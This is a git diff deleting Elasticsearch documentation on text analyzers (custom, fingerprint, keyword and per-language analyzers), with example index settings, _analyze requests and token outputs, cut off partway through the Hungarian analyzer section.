b/docs/reference/analysis/analyzers/custom-analyzer.asciidoc deleted file mode 100644 index 3757a0c3be3..00000000000 --- a/docs/reference/analysis/analyzers/custom-analyzer.asciidoc +++ /dev/null @@ -1,260 +0,0 @@ -[[analysis-custom-analyzer]] -=== Create a custom analyzer - -When the built-in analyzers do not fulfill your needs, you can create a -`custom` analyzer which uses the appropriate combination of: - -* zero or more <> -* a <> -* zero or more <>. - -[discrete] -=== Configuration - -The `custom` analyzer accepts the following parameters: - -[horizontal] -`tokenizer`:: - - A built-in or customised <>. - (Required) - -`char_filter`:: - - An optional array of built-in or customised - <>. - -`filter`:: - - An optional array of built-in or customised - <>. - -`position_increment_gap`:: - - When indexing an array of text values, Elasticsearch inserts a fake "gap" - between the last term of one value and the first term of the next value to - ensure that a phrase query doesn't match two terms from different array - elements. Defaults to `100`. See <> for more. - -[discrete] -=== Example configuration - -Here is an example that combines the following: - -Character Filter:: -* <> - -Tokenizer:: -* <> - -Token Filters:: -* <> -* <> - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "type": "custom", <1> - "tokenizer": "standard", - "char_filter": [ - "html_strip" - ], - "filter": [ - "lowercase", - "asciifolding" - ] - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_custom_analyzer", - "text": "Is this déjà vu?" -} --------------------------------- - -<1> Setting `type` to `custom` tells Elasticsearch that we are defining a custom analyzer. - Compare this to how <>: - `type` will be set to the name of the built-in analyzer, like - <> or <>. - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "is", - "start_offset": 0, - "end_offset": 2, - "type": "", - "position": 0 - }, - { - "token": "this", - "start_offset": 3, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "deja", - "start_offset": 11, - "end_offset": 15, - "type": "", - "position": 2 - }, - { - "token": "vu", - "start_offset": 16, - "end_offset": 22, - "type": "", - "position": 3 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ is, this, deja, vu ] ---------------------------- - -The previous example used tokenizer, token filters, and character filters with -their default configurations, but it is possible to create configured versions -of each and to use them in a custom analyzer. - -Here is a more complicated example that combines the following: - -Character Filter:: -* <>, configured to replace `:)` with `_happy_` and `:(` with `_sad_` - -Tokenizer:: -* <>, configured to split on punctuation characters - -Token Filters:: -* <> -* <>, configured to use the pre-defined list of English stop words - - -Here is an example: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { <1> - "type": "custom", - "char_filter": [ - "emoticons" - ], - "tokenizer": "punctuation", - "filter": [ - "lowercase", - "english_stop" - ] - } - }, - "tokenizer": { - "punctuation": { <2> - "type": "pattern", - "pattern": "[ .,!?]" - } - }, - "char_filter": { - "emoticons": { <3> - "type": "mapping", - "mappings": [ - ":) => _happy_", - ":( => _sad_" - ] - } - }, - "filter": { - "english_stop": { <4> - "type": "stop", - "stopwords": "_english_" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_custom_analyzer", - "text": "I'm a :) person, and you?" -} --------------------------------------------------- - -<1> Assigns the index a default custom analyzer, `my_custom_analyzer`. This -analyzer uses a custom tokenizer, character filter, and token filter that -are defined later in the request. -<2> Defines the custom `punctuation` tokenizer. -<3> Defines the custom `emoticons` character filter. -<4> Defines the custom `english_stop` token filter. - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "i'm", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "_happy_", - "start_offset": 6, - "end_offset": 8, - "type": "word", - "position": 2 - }, - { - "token": "person", - "start_offset": 9, - "end_offset": 15, - "type": "word", - "position": 3 - }, - { - "token": "you", - "start_offset": 21, - "end_offset": 24, - "type": "word", - "position": 5 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ i'm, _happy_, person, you ] ---------------------------- diff --git a/docs/reference/analysis/analyzers/fingerprint-analyzer.asciidoc b/docs/reference/analysis/analyzers/fingerprint-analyzer.asciidoc deleted file mode 100644 index f66acb452c4..00000000000 --- a/docs/reference/analysis/analyzers/fingerprint-analyzer.asciidoc +++ /dev/null @@ -1,178 +0,0 @@ -[[analysis-fingerprint-analyzer]] -=== Fingerprint analyzer -++++ -Fingerprint -++++ - -The `fingerprint` analyzer implements a -https://github.com/OpenRefine/OpenRefine/wiki/Clustering-In-Depth#fingerprint[fingerprinting algorithm] -which is used by the OpenRefine project to assist in clustering. - -Input text is lowercased, normalized to remove extended characters, sorted, -deduplicated and concatenated into a single token. If a stopword list is -configured, stop words will also be removed. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "fingerprint", - "text": "Yes yes, Gödel said this sentence is consistent and." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "and consistent godel is said sentence this yes", - "start_offset": 0, - "end_offset": 52, - "type": "fingerprint", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following single term: - -[source,text] ---------------------------- -[ and consistent godel is said sentence this yes ] ---------------------------- - -[discrete] -=== Configuration - -The `fingerprint` analyzer accepts the following parameters: - -[horizontal] -`separator`:: - - The character to use to concatenate the terms. Defaults to a space. - -`max_output_size`:: - - The maximum token size to emit. Defaults to `255`. Tokens larger than - this size will be discarded. - -`stopwords`:: - - A pre-defined stop words list like `_english_` or an array containing a - list of stop words. Defaults to `_none_`. - -`stopwords_path`:: - - The path to a file containing stop words. - -See the <> for more information -about stop word configuration. - - -[discrete] -=== Example configuration - -In this example, we configure the `fingerprint` analyzer to use the -pre-defined list of English stop words: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_fingerprint_analyzer": { - "type": "fingerprint", - "stopwords": "_english_" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_fingerprint_analyzer", - "text": "Yes yes, Gödel said this sentence is consistent and." -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "consistent godel said sentence yes", - "start_offset": 0, - "end_offset": 52, - "type": "fingerprint", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following term: - -[source,text] ---------------------------- -[ consistent godel said sentence yes ] ---------------------------- - -[discrete] -=== Definition - -The `fingerprint` tokenizer consists of: - -Tokenizer:: -* <> - -Token Filters (in order):: -* <> -* <> -* <> (disabled by default) -* <> - -If you need to customize the `fingerprint` analyzer beyond the configuration -parameters then you need to recreate it as a `custom` analyzer and modify -it, usually by adding token filters. This would recreate the built-in -`fingerprint` analyzer and you can use it as a starting point for further -customization: - -[source,console] ----------------------------------------------------- -PUT /fingerprint_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_fingerprint": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "asciifolding", - "fingerprint" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: fingerprint_example, first: fingerprint, second: rebuilt_fingerprint}\nendyaml\n/] diff --git a/docs/reference/analysis/analyzers/keyword-analyzer.asciidoc b/docs/reference/analysis/analyzers/keyword-analyzer.asciidoc deleted file mode 100644 index 888376bc46f..00000000000 --- a/docs/reference/analysis/analyzers/keyword-analyzer.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[analysis-keyword-analyzer]] -=== Keyword analyzer -++++ -Keyword -++++ - -The `keyword` analyzer is a ``noop'' analyzer which returns the entire input -string as a single token. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "keyword", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone.", - "start_offset": 0, - "end_offset": 56, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following single term: - -[source,text] ---------------------------- -[ The 2 QUICK Brown-Foxes jumped over the lazy dog's bone. ] ---------------------------- - -[discrete] -=== Configuration - -The `keyword` analyzer is not configurable. - -[discrete] -=== Definition - -The `keyword` analyzer consists of: - -Tokenizer:: -* <> - -If you need to customize the `keyword` analyzer then you need to -recreate it as a `custom` analyzer and modify it, usually by adding -token filters. Usually, you should prefer the -<> when you want strings that are not split -into tokens, but just in case you need it, this would recreate the -built-in `keyword` analyzer and you can use it as a starting point -for further customization: - -[source,console] ----------------------------------------------------- -PUT /keyword_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_keyword": { - "tokenizer": "keyword", - "filter": [ <1> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: keyword_example, first: keyword, second: rebuilt_keyword}\nendyaml\n/] - -<1> You'd add any token filters here. diff --git a/docs/reference/analysis/analyzers/lang-analyzer.asciidoc b/docs/reference/analysis/analyzers/lang-analyzer.asciidoc deleted file mode 100644 index e6c08fe4da1..00000000000 --- a/docs/reference/analysis/analyzers/lang-analyzer.asciidoc +++ /dev/null @@ -1,1825 +0,0 @@ -[[analysis-lang-analyzer]] -=== Language analyzers -++++ -Language -++++ - -A set of analyzers aimed at analyzing specific language text. The -following types are supported: -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>. - -==== Configuring language analyzers - -===== Stopwords - -All analyzers support setting custom `stopwords` either internally in -the config, or by using an external stopwords file by setting -`stopwords_path`. Check <> for -more details. - -[[_excluding_words_from_stemming]] -===== Excluding words from stemming - -The `stem_exclusion` parameter allows you to specify an array -of lowercase words that should not be stemmed. Internally, this -functionality is implemented by adding the -<> -with the `keywords` set to the value of the `stem_exclusion` parameter. - -The following analyzers support setting custom `stem_exclusion` list: -`arabic`, `armenian`, `basque`, `bengali`, `bulgarian`, `catalan`, `czech`, -`dutch`, `english`, `finnish`, `french`, `galician`, -`german`, `hindi`, `hungarian`, `indonesian`, `irish`, `italian`, `latvian`, -`lithuanian`, `norwegian`, `portuguese`, `romanian`, `russian`, `sorani`, -`spanish`, `swedish`, `turkish`. - -==== Reimplementing language analyzers - -The built-in language analyzers can be reimplemented as `custom` analyzers -(as described below) in order to customize their behaviour. - -NOTE: If you do not intend to exclude words from being stemmed (the -equivalent of the `stem_exclusion` parameter above), then you should remove -the `keyword_marker` token filter from the custom analyzer configuration. - -[[arabic-analyzer]] -===== `arabic` analyzer - -The `arabic` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /arabic_example -{ - "settings": { - "analysis": { - "filter": { - "arabic_stop": { - "type": "stop", - "stopwords": "_arabic_" <1> - }, - "arabic_keywords": { - "type": "keyword_marker", - "keywords": ["مثال"] <2> - }, - "arabic_stemmer": { - "type": "stemmer", - "language": "arabic" - } - }, - "analyzer": { - "rebuilt_arabic": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "decimal_digit", - "arabic_stop", - "arabic_normalization", - "arabic_keywords", - "arabic_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"arabic_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: arabic_example, first: arabic, second: rebuilt_arabic}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[armenian-analyzer]] -===== `armenian` analyzer - -The `armenian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /armenian_example -{ - "settings": { - "analysis": { - "filter": { - "armenian_stop": { - "type": "stop", - "stopwords": "_armenian_" <1> - }, - "armenian_keywords": { - "type": "keyword_marker", - "keywords": ["օրինակ"] <2> - }, - "armenian_stemmer": { - "type": "stemmer", - "language": "armenian" - } - }, - "analyzer": { - "rebuilt_armenian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "armenian_stop", - "armenian_keywords", - "armenian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"armenian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: armenian_example, first: armenian, second: rebuilt_armenian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[basque-analyzer]] -===== `basque` analyzer - -The `basque` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /basque_example -{ - "settings": { - "analysis": { - "filter": { - "basque_stop": { - "type": "stop", - "stopwords": "_basque_" <1> - }, - "basque_keywords": { - "type": "keyword_marker", - "keywords": ["Adibidez"] <2> - }, - "basque_stemmer": { - "type": "stemmer", - "language": "basque" - } - }, - "analyzer": { - "rebuilt_basque": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "basque_stop", - "basque_keywords", - "basque_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"basque_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: basque_example, first: basque, second: rebuilt_basque}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[bengali-analyzer]] -===== `bengali` analyzer - -The `bengali` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /bengali_example -{ - "settings": { - "analysis": { - "filter": { - "bengali_stop": { - "type": "stop", - "stopwords": "_bengali_" <1> - }, - "bengali_keywords": { - "type": "keyword_marker", - "keywords": ["উদাহরণ"] <2> - }, - "bengali_stemmer": { - "type": "stemmer", - "language": "bengali" - } - }, - "analyzer": { - "rebuilt_bengali": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "decimal_digit", - "bengali_keywords", - "indic_normalization", - "bengali_normalization", - "bengali_stop", - "bengali_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"bengali_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: bengali_example, first: bengali, second: rebuilt_bengali}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[brazilian-analyzer]] -===== `brazilian` analyzer - -The `brazilian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /brazilian_example -{ - "settings": { - "analysis": { - "filter": { - "brazilian_stop": { - "type": "stop", - "stopwords": "_brazilian_" <1> - }, - "brazilian_keywords": { - "type": "keyword_marker", - "keywords": ["exemplo"] <2> - }, - "brazilian_stemmer": { - "type": "stemmer", - "language": "brazilian" - } - }, - "analyzer": { - "rebuilt_brazilian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "brazilian_stop", - "brazilian_keywords", - "brazilian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"brazilian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: brazilian_example, first: brazilian, second: rebuilt_brazilian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[bulgarian-analyzer]] -===== `bulgarian` analyzer - -The `bulgarian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /bulgarian_example -{ - "settings": { - "analysis": { - "filter": { - "bulgarian_stop": { - "type": "stop", - "stopwords": "_bulgarian_" <1> - }, - "bulgarian_keywords": { - "type": "keyword_marker", - "keywords": ["пример"] <2> - }, - "bulgarian_stemmer": { - "type": "stemmer", - "language": "bulgarian" - } - }, - "analyzer": { - "rebuilt_bulgarian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "bulgarian_stop", - "bulgarian_keywords", - "bulgarian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"bulgarian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: bulgarian_example, first: bulgarian, second: rebuilt_bulgarian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[catalan-analyzer]] -===== `catalan` analyzer - -The `catalan` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /catalan_example -{ - "settings": { - "analysis": { - "filter": { - "catalan_elision": { - "type": "elision", - "articles": [ "d", "l", "m", "n", "s", "t"], - "articles_case": true - }, - "catalan_stop": { - "type": "stop", - "stopwords": "_catalan_" <1> - }, - "catalan_keywords": { - "type": "keyword_marker", - "keywords": ["example"] <2> - }, - "catalan_stemmer": { - "type": "stemmer", - "language": "catalan" - } - }, - "analyzer": { - "rebuilt_catalan": { - "tokenizer": "standard", - "filter": [ - "catalan_elision", - "lowercase", - "catalan_stop", - "catalan_keywords", - "catalan_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"catalan_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: catalan_example, first: catalan, second: rebuilt_catalan}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[cjk-analyzer]] -===== `cjk` analyzer - -NOTE: You may find that `icu_analyzer` in the ICU analysis plugin works better -for CJK text than the `cjk` analyzer. Experiment with your text and queries. - -The `cjk` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /cjk_example -{ - "settings": { - "analysis": { - "filter": { - "english_stop": { - "type": "stop", - "stopwords": [ <1> - "a", "and", "are", "as", "at", "be", "but", "by", "for", - "if", "in", "into", "is", "it", "no", "not", "of", "on", - "or", "s", "such", "t", "that", "the", "their", "then", - "there", "these", "they", "this", "to", "was", "will", - "with", "www" - ] - } - }, - "analyzer": { - "rebuilt_cjk": { - "tokenizer": "standard", - "filter": [ - "cjk_width", - "lowercase", - "cjk_bigram", - "english_stop" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"cjk_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: cjk_example, first: cjk, second: rebuilt_cjk}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. The default stop words are - *almost* the same as the `_english_` set, but not exactly - the same. - -[[czech-analyzer]] -===== `czech` analyzer - -The `czech` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /czech_example -{ - "settings": { - "analysis": { - "filter": { - "czech_stop": { - "type": "stop", - "stopwords": "_czech_" <1> - }, - "czech_keywords": { - "type": "keyword_marker", - "keywords": ["příklad"] <2> - }, - "czech_stemmer": { - "type": "stemmer", - "language": "czech" - } - }, - "analyzer": { - "rebuilt_czech": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "czech_stop", - "czech_keywords", - "czech_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"czech_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: czech_example, first: czech, second: rebuilt_czech}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[danish-analyzer]] -===== `danish` analyzer - -The `danish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /danish_example -{ - "settings": { - "analysis": { - "filter": { - "danish_stop": { - "type": "stop", - "stopwords": "_danish_" <1> - }, - "danish_keywords": { - "type": "keyword_marker", - "keywords": ["eksempel"] <2> - }, - "danish_stemmer": { - "type": "stemmer", - "language": "danish" - } - }, - "analyzer": { - "rebuilt_danish": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "danish_stop", - "danish_keywords", - "danish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"danish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: danish_example, first: danish, second: rebuilt_danish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[dutch-analyzer]] -===== `dutch` analyzer - -The `dutch` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /dutch_example -{ - "settings": { - "analysis": { - "filter": { - "dutch_stop": { - "type": "stop", - "stopwords": "_dutch_" <1> - }, - "dutch_keywords": { - "type": "keyword_marker", - "keywords": ["voorbeeld"] <2> - }, - "dutch_stemmer": { - "type": "stemmer", - "language": "dutch" - }, - "dutch_override": { - "type": "stemmer_override", - "rules": [ - "fiets=>fiets", - "bromfiets=>bromfiets", - "ei=>eier", - "kind=>kinder" - ] - } - }, - "analyzer": { - "rebuilt_dutch": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "dutch_stop", - "dutch_keywords", - "dutch_override", - "dutch_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"dutch_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: dutch_example, first: dutch, second: rebuilt_dutch}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[english-analyzer]] -===== `english` analyzer - -The `english` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /english_example -{ - "settings": { - "analysis": { - "filter": { - "english_stop": { - "type": "stop", - "stopwords": "_english_" <1> - }, - "english_keywords": { - "type": "keyword_marker", - "keywords": ["example"] <2> - }, - "english_stemmer": { - "type": "stemmer", - "language": "english" - }, - "english_possessive_stemmer": { - "type": "stemmer", - "language": "possessive_english" - } - }, - "analyzer": { - "rebuilt_english": { - "tokenizer": "standard", - "filter": [ - "english_possessive_stemmer", - "lowercase", - "english_stop", - "english_keywords", - "english_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"english_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: english_example, first: english, second: rebuilt_english}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[estonian-analyzer]] -===== `estonian` analyzer - -The `estonian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /estonian_example -{ - "settings": { - "analysis": { - "filter": { - "estonian_stop": { - "type": "stop", - "stopwords": "_estonian_" <1> - }, - "estonian_keywords": { - "type": "keyword_marker", - "keywords": ["näide"] <2> - }, - "estonian_stemmer": { - "type": "stemmer", - "language": "estonian" - } - }, - "analyzer": { - "rebuilt_estonian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "estonian_stop", - "estonian_keywords", - "estonian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"estonian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: estonian_example, first: estonian, second: rebuilt_estonian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[finnish-analyzer]] -===== `finnish` analyzer - -The `finnish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /finnish_example -{ - "settings": { - "analysis": { - "filter": { - "finnish_stop": { - "type": "stop", - "stopwords": "_finnish_" <1> - }, - "finnish_keywords": { - "type": "keyword_marker", - "keywords": ["esimerkki"] <2> - }, - "finnish_stemmer": { - "type": "stemmer", - "language": "finnish" - } - }, - "analyzer": { - "rebuilt_finnish": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "finnish_stop", - "finnish_keywords", - "finnish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"finnish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: finnish_example, first: finnish, second: rebuilt_finnish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[french-analyzer]] -===== `french` analyzer - -The `french` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /french_example -{ - "settings": { - "analysis": { - "filter": { - "french_elision": { - "type": "elision", - "articles_case": true, - "articles": [ - "l", "m", "t", "qu", "n", "s", - "j", "d", "c", "jusqu", "quoiqu", - "lorsqu", "puisqu" - ] - }, - "french_stop": { - "type": "stop", - "stopwords": "_french_" <1> - }, - "french_keywords": { - "type": "keyword_marker", - "keywords": ["Example"] <2> - }, - "french_stemmer": { - "type": "stemmer", - "language": "light_french" - } - }, - "analyzer": { - "rebuilt_french": { - "tokenizer": "standard", - "filter": [ - "french_elision", - "lowercase", - "french_stop", - "french_keywords", - "french_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"french_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: french_example, first: french, second: rebuilt_french}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[galician-analyzer]] -===== `galician` analyzer - -The `galician` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /galician_example -{ - "settings": { - "analysis": { - "filter": { - "galician_stop": { - "type": "stop", - "stopwords": "_galician_" <1> - }, - "galician_keywords": { - "type": "keyword_marker", - "keywords": ["exemplo"] <2> - }, - "galician_stemmer": { - "type": "stemmer", - "language": "galician" - } - }, - "analyzer": { - "rebuilt_galician": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "galician_stop", - "galician_keywords", - "galician_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"galician_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: galician_example, first: galician, second: rebuilt_galician}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[german-analyzer]] -===== `german` analyzer - -The `german` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /german_example -{ - "settings": { - "analysis": { - "filter": { - "german_stop": { - "type": "stop", - "stopwords": "_german_" <1> - }, - "german_keywords": { - "type": "keyword_marker", - "keywords": ["Beispiel"] <2> - }, - "german_stemmer": { - "type": "stemmer", - "language": "light_german" - } - }, - "analyzer": { - "rebuilt_german": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "german_stop", - "german_keywords", - "german_normalization", - "german_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"german_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: german_example, first: german, second: rebuilt_german}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[greek-analyzer]] -===== `greek` analyzer - -The `greek` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /greek_example -{ - "settings": { - "analysis": { - "filter": { - "greek_stop": { - "type": "stop", - "stopwords": "_greek_" <1> - }, - "greek_lowercase": { - "type": "lowercase", - "language": "greek" - }, - "greek_keywords": { - "type": "keyword_marker", - "keywords": ["παράδειγμα"] <2> - }, - "greek_stemmer": { - "type": "stemmer", - "language": "greek" - } - }, - "analyzer": { - "rebuilt_greek": { - "tokenizer": "standard", - "filter": [ - "greek_lowercase", - "greek_stop", - "greek_keywords", - "greek_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"greek_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: greek_example, first: greek, second: rebuilt_greek}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[hindi-analyzer]] -===== `hindi` analyzer - -The `hindi` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /hindi_example -{ - "settings": { - "analysis": { - "filter": { - "hindi_stop": { - "type": "stop", - "stopwords": "_hindi_" <1> - }, - "hindi_keywords": { - "type": "keyword_marker", - "keywords": ["उदाहरण"] <2> - }, - "hindi_stemmer": { - "type": "stemmer", - "language": "hindi" - } - }, - "analyzer": { - "rebuilt_hindi": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "decimal_digit", - "hindi_keywords", - "indic_normalization", - "hindi_normalization", - "hindi_stop", - "hindi_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"hindi_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: hindi_example, first: hindi, second: rebuilt_hindi}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[hungarian-analyzer]] -===== `hungarian` analyzer - -The `hungarian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT 